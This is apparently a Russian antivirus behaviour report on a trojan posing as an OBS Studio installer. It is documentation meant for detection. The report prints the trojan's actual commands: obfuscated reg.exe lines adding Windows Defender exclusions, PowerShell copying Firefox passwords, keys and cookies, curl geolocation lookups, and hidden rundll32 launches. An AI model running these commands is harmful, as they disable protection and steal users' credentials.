Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\obs studio.lnk
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра::
- [<HKLM>\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS] 'dlL' = '00000000'
- [<HKLM>\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions] 'CMd' = '00000000'
- [<HKLM>\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs] 'scr' = '00000000'
- [<HKLM>\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs] 'eXe' = '00000000'
- [<HKLM>\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS] '<DRIVERS>\etC\hostS' = '00000000'
Запускает на исполнение
- '%WINDIR%\syswow64\taskkill.exe' /f /im "obs64.scr"
Внедряет код в
следующие пользовательские процессы:
- obs64.scr
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\is-hq9qr.tmp\<Имя файла>.tmp
- %WINDIR%\temp\aut2ebe.tmp
- %WINDIR%\temp\2q9x6l8k.tmp
- %WINDIR%\temp\aut2e8e.tmp
- %WINDIR%\temp\aut2a5c.tmp
- %WINDIR%\temp\aut2a3c.tmp
- %WINDIR%\temp\0wyn8g8l.tmp
- %WINDIR%\temp\aut28c4.tmp
- %TEMP%\aut2637.tmp
- %TEMP%\aut2617.tmp
- %TEMP%\8wyn9g6l.tmp
- %TEMP%\aut2606.tmp
- %WINDIR%\temp\aut228f.tmp
- %WINDIR%\temp\2pjx1g7n.tmp
- %WINDIR%\temp\aut385e.tmp
- %WINDIR%\temp\aut224f.tmp
- %TEMP%\aut1d71.tmp
- %TEMP%\aut1d70.tmp
- %TEMP%\2l5o4o4q.tmp
- %TEMP%\aut1d5f.tmp
- %WINDIR%\temp\aut1cb5.tmp
- %WINDIR%\temp\aut1c95.tmp
- %WINDIR%\temp\2v5r0d8d.tmp
- %WINDIR%\temp\aut1c85.tmp
- %TEMP%\aut147b.tmp
- %TEMP%\aut146b.tmp
- %WINDIR%\temp\aut226f.tmp
- %APPDATA%\obs-studio\bin\64bit\is-lu6tc.tmp
- %WINDIR%\temp\1l9d7c6o.tmp
- %TEMP%\l8iezw856p061065065.tmp
- %TEMP%\ifahr05wwvzc9ht0ys3ouaf041.sess
- %TEMP%\7sqqq8wpmxsn9pfdbkk4n.tmp
- %WINDIR%\temp\aut622e.tmp
- %WINDIR%\temp\aut620d.tmp
- %WINDIR%\temp\4pfy6x6u.tmp
- %WINDIR%\temp\aut61fd.tmp
- %WINDIR%\temp\aut58ea.tmp
- %WINDIR%\temp\aut5792.tmp
- %WINDIR%\temp\4xeo7v8u.tmp
- %WINDIR%\temp\aut5772.tmp
- %APPDATA%\obs-studio\bin\64bit\.vbs
- %TEMP%\2e5e6x0u.tmp
- %WINDIR%\temp\aut2ecf.tmp
- %WINDIR%\temp\aut4cb9.tmp
- %WINDIR%\temp\2h8d7c2s.tmp
- %WINDIR%\temp\aut4ca9.tmp
- %TEMP%\aut431a.tmp
- %TEMP%\aut42f9.tmp
- %TEMP%\1y9h5y2p.tmp
- %TEMP%\aut42ba.tmp
- %WINDIR%\temp\aut3969.tmp
- %WINDIR%\temp\aut392a.tmp
- %WINDIR%\temp\2a9j4y4f.tmp
- %WINDIR%\temp\aut3919.tmp
- %WINDIR%\temp\aut38bd.tmp
- %WINDIR%\temp\aut4cca.tmp
- %WINDIR%\temp\aut389d.tmp
- %TEMP%\aut144b.tmp
- %WINDIR%\temp\aut117f.tmp
- %WINDIR%\temp\aut1130.tmp
- %APPDATA%\obs-studio\bin\64bit\is-m38dn.tmp
- %APPDATA%\obs-studio\bin\64bit\is-j6hat.tmp
- %APPDATA%\obs-studio\bin\64bit\is-0jh46.tmp
- %APPDATA%\obs-studio\bin\64bit\is-8hipt.tmp
- %APPDATA%\obs-studio\bin\64bit\is-rogjg.tmp
- %APPDATA%\obs-studio\bin\64bit\is-a3538.tmp
- %APPDATA%\obs-studio\bin\64bit\is-en978.tmp
- %APPDATA%\obs-studio\bin\64bit\is-0cc9g.tmp
- %APPDATA%\obs-studio\bin\64bit\is-qf96d.tmp
- %APPDATA%\obs-studio\bin\64bit\is-t3cke.tmp
- %APPDATA%\obs-studio\bin\64bit\is-pegc3.tmp
- %APPDATA%\obs-studio\bin\64bit\is-o7p33.tmp
- %TEMP%\9xolyqx5mje1065065.tmp
- %APPDATA%\obs-studio\bin\64bit\is-cign0.tmp
- %APPDATA%\obs-studio\bin\64bit\is-6oo8v.tmp
- %APPDATA%\obs-studio\bin\64bit\is-tuknr.tmp
- %APPDATA%\obs-studio\bin\64bit\platforms\is-9lv5m.tmp
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-j89ia.tmp
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-ft2o2.tmp
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-3m4d2.tmp
- %APPDATA%\obs-studio\bin\64bit\iconengines\is-qrcmh.tmp
- %TEMP%\is-d2bpf.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-d2bpf.tmp\_isetup\_setup64.tmp
- %TEMP%\is-ldfvd.tmp\<Имя файла>.tmp
- %TEMP%\is-vlvvb.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-vlvvb.tmp\_isetup\_setup64.tmp
- C:\tmp\is-kmphn.tmp
- %APPDATA%\obs-studio\bin\64bit\.cmd
- %APPDATA%\obs-studio\bin\64bit\is-d5kgk.tmp
- %APPDATA%\obs-studio\bin\64bit\is-38vnh.tmp
- %APPDATA%\obs-studio\bin\64bit\is-4v7g4.tmp
- %WINDIR%\temp\2t5j8o4t.tmp
- %WINDIR%\temp\aut1110.tmp
- %TEMP%\aut742.tmp
- %TEMP%\aut6f3.tmp
- %TEMP%\2k6g2a0x.tmp
- %TEMP%\aut6e3.tmp
- %TEMP%\is-d2bpf.tmp\temp\.cmd
- C:\tmp\.vbs
- C:\tmp\.cmd
- %APPDATA%\obs-studio\bin\64bit\is-rqdv7.tmp
- %APPDATA%\obs-studio\bin\64bit\is-bj9c5.tmp
- %APPDATA%\obs-studio\bin\64bit\is-n8e9q.tmp
- %APPDATA%\obs-studio\bin\64bit\is-f767p.tmp
- %APPDATA%\obs-studio\bin\64bit\is-3f5cn.tmp
- %APPDATA%\obs-studio\bin\64bit\is-ers20.tmp
- %APPDATA%\obs-studio\bin\64bit\is-bbkco.tmp
- C:\tmp\is-4r9oi.tmp
- %APPDATA%\obs-studio\bin\64bit\is-pm81v.tmp
- %APPDATA%\obs-studio\bin\64bit\is-4v12n.tmp
- %APPDATA%\obs-studio\bin\64bit\is-unvaa.tmp
- %TEMP%\is-d2bpf.tmp\temp\is-44a32.tmp
- %APPDATA%\obs-studio\bin\64bit\is-13569.tmp
- %APPDATA%\obs-studio\bin\64bit\is-og16i.tmp
- %APPDATA%\obs-studio\bin\64bit\is-e5qbm.tmp
- %APPDATA%\obs-studio\bin\64bit\styles\is-2tbub.tmp
- %APPDATA%\obs-studio\bin\64bit\is-eorsi.tmp
- %TEMP%\jwjco7ga6vgk8oim1074878.tmp-shm
Присваивает атрибут 'скрытый' для следующих файлов
- C:\tmp\obs32.dll
- %APPDATA%\obs-studio\bin\64bit\obs64.scr
- %TEMP%\is-d2bpf.tmp\temp\r.exe
- %APPDATA%\obs-studio\bin\64bit\.cmd
- %APPDATA%\obs-studio\bin\64bit\.vbs
Удаляет следующие файлы
- %TEMP%\is-vlvvb.tmp\_isetup\_setup64.tmp
- %WINDIR%\temp\aut4cca.tmp
- %WINDIR%\temp\aut4cb9.tmp
- %WINDIR%\temp\aut4ca9.tmp
- %TEMP%\1y9h5y2p.tmp
- %TEMP%\aut431a.tmp
- %TEMP%\aut42f9.tmp
- %TEMP%\aut42ba.tmp
- %WINDIR%\temp\2a9j4y4f.tmp
- %WINDIR%\temp\aut3969.tmp
- %WINDIR%\temp\aut392a.tmp
- %WINDIR%\temp\aut3919.tmp
- %WINDIR%\temp\1l9d7c6o.tmp
- %WINDIR%\temp\aut38bd.tmp
- %WINDIR%\temp\aut389d.tmp
- %WINDIR%\temp\aut385e.tmp
- %WINDIR%\temp\2h8d7c2s.tmp
- %WINDIR%\temp\aut5772.tmp
- %TEMP%\9xolyqx5mje1065065.tmp
- %WINDIR%\temp\aut5792.tmp
- %TEMP%\l8iezw856p061065065.tmp
- %TEMP%\7sqqq8wpmxsn9pfdbkk4n.tmp
- %TEMP%\is-ldfvd.tmp\<Имя файла>.tmp
- %TEMP%\is-d2bpf.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-d2bpf.tmp\_isetup\_setup64.tmp
- %TEMP%\is-d2bpf.tmp\temp\r.exe
- C:\tmp\mainicon.ico
- %APPDATA%\obs-studio\bin\64bit\ar.xml
- C:\tmp\obs32.dll
- %WINDIR%\temp\4pfy6x6u.tmp
- %WINDIR%\temp\aut622e.tmp
- %WINDIR%\temp\aut620d.tmp
- %WINDIR%\temp\aut61fd.tmp
- %WINDIR%\temp\4xeo7v8u.tmp
- %WINDIR%\temp\aut58ea.tmp
- %WINDIR%\temp\2q9x6l8k.tmp
- %TEMP%\is-d2bpf.tmp\temp\.cmd
- %WINDIR%\temp\aut2ecf.tmp
- %WINDIR%\temp\aut1cb5.tmp
- %WINDIR%\temp\aut1c85.tmp
- %TEMP%\2e5e6x0u.tmp
- %TEMP%\aut147b.tmp
- %TEMP%\aut146b.tmp
- %TEMP%\aut144b.tmp
- %WINDIR%\temp\2t5j8o4t.tmp
- %WINDIR%\temp\aut117f.tmp
- %WINDIR%\temp\aut1130.tmp
- %WINDIR%\temp\aut1110.tmp
- %TEMP%\2k6g2a0x.tmp
- %TEMP%\aut742.tmp
- %TEMP%\aut6f3.tmp
- %TEMP%\aut6e3.tmp
- %TEMP%\is-hq9qr.tmp\<Имя файла>.tmp
- %TEMP%\is-vlvvb.tmp\_isetup\_shfoldr.dll
- %WINDIR%\temp\aut1c95.tmp
- %WINDIR%\temp\2v5r0d8d.tmp
- %WINDIR%\temp\aut2e8e.tmp
- %TEMP%\aut1d5f.tmp
- %WINDIR%\temp\0wyn8g8l.tmp
- %WINDIR%\temp\aut2a5c.tmp
- %WINDIR%\temp\aut2a3c.tmp
- %WINDIR%\temp\aut28c4.tmp
- %TEMP%\8wyn9g6l.tmp
- %TEMP%\aut2637.tmp
- %TEMP%\aut2617.tmp
- %TEMP%\aut2606.tmp
- %WINDIR%\temp\2pjx1g7n.tmp
- %WINDIR%\temp\aut228f.tmp
- %WINDIR%\temp\aut226f.tmp
- %WINDIR%\temp\aut224f.tmp
- %TEMP%\2l5o4o4q.tmp
- %TEMP%\aut1d71.tmp
- %TEMP%\aut1d70.tmp
- %WINDIR%\temp\aut2ebe.tmp
- %TEMP%\jwjco7ga6vgk8oim1074878.tmp-shm
Перемещает следующие файлы
- %APPDATA%\obs-studio\bin\64bit\iconengines\is-qrcmh.tmp в %APPDATA%\obs-studio\bin\64bit\iconengines\qsvgicon.dll
- %APPDATA%\obs-studio\bin\64bit\is-n8e9q.tmp в %APPDATA%\obs-studio\bin\64bit\obs64.scr
- %APPDATA%\obs-studio\bin\64bit\is-38vnh.tmp в %APPDATA%\obs-studio\bin\64bit\libmbedtls.dll
- %APPDATA%\obs-studio\bin\64bit\styles\is-2tbub.tmp в %APPDATA%\obs-studio\bin\64bit\styles\qwindowsvistastyle.dll
- %APPDATA%\obs-studio\bin\64bit\is-e5qbm.tmp в %APPDATA%\obs-studio\bin\64bit\avdevice-59.dll
- %APPDATA%\obs-studio\bin\64bit\is-og16i.tmp в %APPDATA%\obs-studio\bin\64bit\lua51.dll
- %APPDATA%\obs-studio\bin\64bit\is-13569.tmp в %APPDATA%\obs-studio\bin\64bit\obs-amf-test.exe
- %TEMP%\is-d2bpf.tmp\temp\is-44a32.tmp в %TEMP%\is-d2bpf.tmp\temp\r.exe
- %APPDATA%\obs-studio\bin\64bit\is-pegc3.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-winrt.dll
- %APPDATA%\obs-studio\bin\64bit\is-unvaa.tmp в %APPDATA%\obs-studio\bin\64bit\obs-amf-test.pdb
- %APPDATA%\obs-studio\bin\64bit\is-pm81v.tmp в %APPDATA%\obs-studio\bin\64bit\obs-ffmpeg-mux.pdb
- C:\tmp\is-4r9oi.tmp в C:\tmp\mainicon.ico
- %APPDATA%\obs-studio\bin\64bit\is-bbkco.tmp в %APPDATA%\obs-studio\bin\64bit\libmbedx509.dll
- %APPDATA%\obs-studio\bin\64bit\is-ers20.tmp в %APPDATA%\obs-studio\bin\64bit\obsglad.pdb
- %APPDATA%\obs-studio\bin\64bit\is-lu6tc.tmp в %APPDATA%\obs-studio\bin\64bit\swresample-4.dll
- %APPDATA%\obs-studio\bin\64bit\is-eorsi.tmp в %APPDATA%\obs-studio\bin\64bit\swscale-6.dll
- %APPDATA%\obs-studio\bin\64bit\is-f767p.tmp в %APPDATA%\obs-studio\bin\64bit\w32-pthreads.dll
- %APPDATA%\obs-studio\bin\64bit\is-d5kgk.tmp в %APPDATA%\obs-studio\bin\64bit\libsrt.dll
- %APPDATA%\obs-studio\bin\64bit\is-4v7g4.tmp в %APPDATA%\obs-studio\bin\64bit\libx264-164.dll
- %APPDATA%\obs-studio\bin\64bit\is-cign0.tmp в %APPDATA%\obs-studio\bin\64bit\librist.dll
- %APPDATA%\obs-studio\bin\64bit\is-3f5cn.tmp в %APPDATA%\obs-studio\bin\64bit\obsglad.dll
- %APPDATA%\obs-studio\bin\64bit\is-j6hat.tmp в %APPDATA%\obs-studio\bin\64bit\obs.pdb
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-ft2o2.tmp в %APPDATA%\obs-studio\bin\64bit\imageformats\qjpeg.dll
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-j89ia.tmp в %APPDATA%\obs-studio\bin\64bit\imageformats\qsvg.dll
- %APPDATA%\obs-studio\bin\64bit\platforms\is-9lv5m.tmp в %APPDATA%\obs-studio\bin\64bit\platforms\qwindows.dll
- %APPDATA%\obs-studio\bin\64bit\is-tuknr.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-d3d11.dll
- %APPDATA%\obs-studio\bin\64bit\is-6oo8v.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-d3d11.pdb
- %APPDATA%\obs-studio\bin\64bit\is-m38dn.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-opengl.dll
- C:\tmp\is-kmphn.tmp в C:\tmp\obs32.dll
- %APPDATA%\obs-studio\bin\64bit\is-bj9c5.tmp в %APPDATA%\obs-studio\bin\64bit\w32-pthreads.pdb
- %APPDATA%\obs-studio\bin\64bit\is-4v12n.tmp в %APPDATA%\obs-studio\bin\64bit\obs-ffmpeg-mux.exe
- %APPDATA%\obs-studio\bin\64bit\is-o7p33.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-opengl.pdb
- %APPDATA%\obs-studio\bin\64bit\is-qf96d.tmp в %APPDATA%\obs-studio\bin\64bit\obs-frontend-api.pdb
- %APPDATA%\obs-studio\bin\64bit\is-0cc9g.tmp в %APPDATA%\obs-studio\bin\64bit\libcurl.dll
- %APPDATA%\obs-studio\bin\64bit\is-en978.tmp в %APPDATA%\obs-studio\bin\64bit\libmbedcrypto.dll
- %APPDATA%\obs-studio\bin\64bit\is-a3538.tmp в %APPDATA%\obs-studio\bin\64bit\ar.xml
- %APPDATA%\obs-studio\bin\64bit\is-rogjg.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-winrt.pdb
- %APPDATA%\obs-studio\bin\64bit\is-8hipt.tmp в %APPDATA%\obs-studio\bin\64bit\obs-scripting.dll
- %APPDATA%\obs-studio\bin\64bit\is-0jh46.tmp в %APPDATA%\obs-studio\bin\64bit\obs-scripting.pdb
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-3m4d2.tmp в %APPDATA%\obs-studio\bin\64bit\imageformats\qgif.dll
- %APPDATA%\obs-studio\bin\64bit\is-t3cke.tmp в %APPDATA%\obs-studio\bin\64bit\obs-frontend-api.dll
- %APPDATA%\obs-studio\bin\64bit\is-rqdv7.tmp в %APPDATA%\obs-studio\bin\64bit\zlib.dll
Подменяет следующие файлы
- %TEMP%\is-d2bpf.tmp\temp\.cmd
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\is-hq9qr.tmp\<Имя файла>.tmp' /SL5="$11022C,12110641,160256,<Полный путь к файлу>"
- '%TEMP%\is-ldfvd.tmp\<Имя файла>.tmp' /SL5="$160224,12110641,160256,<Полный путь к файлу>" /verysilent /sp-
- '%APPDATA%\obs-studio\bin\64bit\obs64.scr'
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /TI/ /sw:0 reg.eXe add "hKlm\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS" /V "<DRIVERS>\etC\hostS" /T "reg_dWord" /d "0" /f
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /sw:0 reG.eXe Add "hKlM\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS" /V dlL /t reg_dword /d 0 /F
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /SW:0 reG.eXe add "hKlm\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs" /v scr /T reG_dwOrd /d 0 /f
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /sw:0 reg.exe add "hKLM\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions" /v CMd /t reg_dwOrd /d 0 /f
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /SW:0 reG.eXe add "hKlM\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs" /V eXe /T reg_dwOrd /d 0 /f
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /TI/ /sw:0 reG.eXe Add "hKlM\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS" /V dlL /t reg_dword /d 0 /F
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /TI/ /sw:0 reg.exe add "hKLM\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions" /v CMd /t reg_dwOrd /d 0 /f
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /TI/ /SW:0 reG.eXe add "hKlm\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs" /v scr /T reG_dwOrd /d 0 /f
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /sw:0 reg.eXe add "hKlm\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS" /V "<DRIVERS>\etC\hostS" /T "reg_dWord" /d "0" /f
- '%TEMP%\is-d2bpf.tmp\temp\r.exe' /TI/ /SW:0 reG.eXe add "hKlM\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs" /V eXe /T reg_dwOrd /d 0 /f
- '<SYSTEM32>\reg.exe' add "hKlm\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs" /v scr /T reG_dwOrd /d 0 /f' (со скрытым окном)
- '%APPDATA%\obs-studio\bin\64bit\obs64.scr' ' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "hKlm\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS" /V "<DRIVERS>\etC\hostS" /T "reg_dWord" /d "0" /f' (со скрытым окном)
- '<SYSTEM32>\reg.exe' Add "hKlM\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS" /V dlL /t reg_dword /d 0 /F' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "hKlM\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs" /V eXe /T reg_dwOrd /d 0 /f' (со скрытым окном)
- '%WINDIR%\syswow64\rundll32.exe' C:\tmp\obs32.dll, Uaby' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\is-D2BPF.tmp\temp\.cmd""' (со скрытым окном)
- '%WINDIR%\syswow64\taskkill.exe' /f /im "obs64.scr"' (со скрытым окном)
- '<Полный путь к файлу>' /verysilent /sp-' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "hKLM\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions" /v CMd /t reg_dwOrd /d 0 /f' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\logins.json\" \"%TEMP%\6whvzbccxcz1065065.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\key3.db\" \"%TEMP%\l8...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\\Profiles/gn7ryp3k.default\formhistory.sqlite\" \"%TEMP%\sib13ohlr9k1074878.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\\Profiles/gn7ryp3k.default\cookies.sqli...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\rundll32.exe' C:\tmp\obs32.dll, Uaby
- '<SYSTEM32>\rundll32.exe' C:\tmp\obs32.dll, Uaby
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\is-D2BPF.tmp\temp\.cmd""
- '<SYSTEM32>\reg.exe' Add "hKlM\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS" /V dlL /t reg_dword /d 0 /F
- '<SYSTEM32>\reg.exe' add "hKLM\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions" /v CMd /t reg_dwOrd /d 0 /f
- '<SYSTEM32>\reg.exe' add "hKlm\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs" /v scr /T reG_dwOrd /d 0 /f
- '<SYSTEM32>\reg.exe' add "hKlM\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs" /V eXe /T reg_dwOrd /d 0 /f
- '%WINDIR%\syswow64\cmd.exe' /c cUrL -s ipINFO.io/Ip
- '%WINDIR%\syswow64\cmd.exe' /c cuRL -s IPINfo.Io/city
- '%WINDIR%\syswow64\cmd.exe' /c cUrl -s IPiNfo.io/country
- '<SYSTEM32>\reg.exe' add "hKlm\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS" /V "<DRIVERS>\etC\hostS" /T "reg_dWord" /d "0" /f
- '%WINDIR%\syswow64\attrib.exe' +s +H %APPDATA%\obs-studio\bin\64bit\.cmD
- '%WINDIR%\syswow64\attrib.exe' +s +h %APPDATA%\obs-studio\bin\64bit\.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\logins.json\" \"%TEMP%\6whvzbccxcz1065065.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\key3.db\" \"%TEMP%\l8...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\\Profiles/gn7ryp3k.default\formhistory.sqlite\" \"%TEMP%\sib13ohlr9k1074878.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\\Profiles/gn7ryp3k.default\cookies.sqli...
